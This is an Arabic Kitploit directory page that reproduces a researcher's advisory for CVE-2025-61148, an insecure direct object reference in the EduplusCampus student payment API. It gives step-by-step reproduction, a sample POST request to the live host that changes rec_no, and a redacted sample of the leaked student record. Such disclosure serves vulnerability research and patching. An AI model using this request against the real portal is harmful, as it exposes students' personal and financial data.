Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-61148 — توجد الثغرة في واجهة برمجة التطبيقات Student Payment API. يفشل التطبيق في التحقق بشكل صحيح من أن المستخدم الذي يطلب إيصالًا مرخَّصًا له لعرضه. من خلال تعديل معامل rec_no في طلب الواجهة البرمجية، يمكن للمهاجم الوصول إلى إيصالات المستخدمين الآخرين. | Kitploit
أدوات/GitHubGitHub/sharma19d/cve-2025-61148
تحليل الثغرات الأمنيةاستغلال تطبيقات الويباختبار أمان APIجمع المعلوماتاختبار الاختراقالتعلم والتعليم
GitHubsharma19d/cve-2025-61148

CVE-2025-61148

توجد الثغرة في واجهة برمجة التطبيقات Student Payment API. يفشل التطبيق في التحقق بشكل صحيح من أن المستخدم الذي يطلب إيصالًا مرخَّصًا له لعرضه. من خلال تعديل معامل rec_no في طلب الواجهة البرمجية، يمكن للمهاجم الوصول إلى إيصالات المستخدمين الآخرين.

عرض المستودع
4منذ 9 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-61148

توجد الثغرة في واجهة Student Payment API. يفشل التطبيق في التحقق بشكل صحيح من أن المستخدم الذي يطلب إيصالًا مخوَّلًا لعرضه. من خلال تعديل معامل rec_no في طلب الواجهة، يمكن للمهاجم الوصول إلى إيصالات المستخدمين الآخرين.

CVE-2025-61148: ثغرة IDOR في EduplusCampus Student Payment API

معرف CVE: CVE-2025-61148 نوع الثغرة: مرجع كائن مباشر غير آمن (Insecure Direct Object Reference - IDOR) المنتج المتأثر: EduplusCampus نقطة النهاية المتأثرة (Endpoint): /student/get-receipt الباحث: Vinay Sharma

الملخص

تم تحديد ثغرة حرجة من نوع مرجع الكائن المباشر غير الآمن (IDOR) في بوابة طلاب EduplusCampus (الإصدار 3.0.1). تتيح هذه الثغرة لمستخدم موثَّق الوصول إلى السجلات المالية والشخصية الحساسة لطلاب آخرين من خلال تعديل معامل rec_no في طلب الواجهة.

التأثير

يسمح الاستغلال الناجح للمهاجم باسترجاع:

  • الاسم الكامل ورقم القيد (Roll Number)
  • مبلغ الدفع وتواريخه
  • معرّفات المعاملات (TID) والتفاصيل المصرفية
  • المعلومات الشخصية القابلة للتعريف (PII)

تفاصيل الثغرة

يفشل التطبيق في التحقق بشكل صحيح من تفويض المستخدم الذي يطلب إيصال الدفع. معامل rec_no تسلسلي أو قابل للتخمين، ويعيد الخادم تفاصيل الإيصال للرقم المطلوب دون التحقق مما إذا كان يخص المستخدم المسجَّل دخوله حاليًا.

خطوات إعادة الإنتاج

  1. سجّل الدخول إلى بوابة الطلاب.
  2. انتقل إلى قسم إنشاء الإيصال.
  3. اعترض طلب POST المُرسَل إلى /student/get-receipt.
  4. حدّد موقع معامل rec_no في نص JSON.
  5. عدّل قيمة rec_no إلى رقم إيصال صحيح آخر (على سبيل المثال، غيّر PCUF-232025 إلى PCUF-231824).
  6. أرسل الطلب.
  7. يستجيب الخادم بالتفاصيل الشخصية والمالية للطالب المرتبط برقم الإيصال ذلك.
صورة
صورة

مثال على الطلب

root@kitploit:~
POST /student/get-receipt HTTP/1.1
Host: student.edupluscampus.com
Content-Type: application/json
Authorization: Bearer <token>

{
    "rec_no": "PCUF-233012"
}

### Leaked DATA Example:
{
    "fullname": "REDACTED_NAME",
    "rollno": "CSE2019XXX",
    "component_total_amount": 55000.0,
    "trans_list": [
        {
            "date": "21-Oct-2024",
            "mode": "Online",
            "amount": 55000.0,
            "tid": "42951XXXX"
        }
    ]
}

معلومات البائع

  • البائع: EduplusCampus
  • المنتج: بوابة طلاب EduplusCampus / واجهة Student Payment API

الإصدارات المتأثرة

  • الإصدار: EduplusCampus 3.0.1

المكتشف

  • Vinay Sharma - باحث أمني
تنزيل الأداة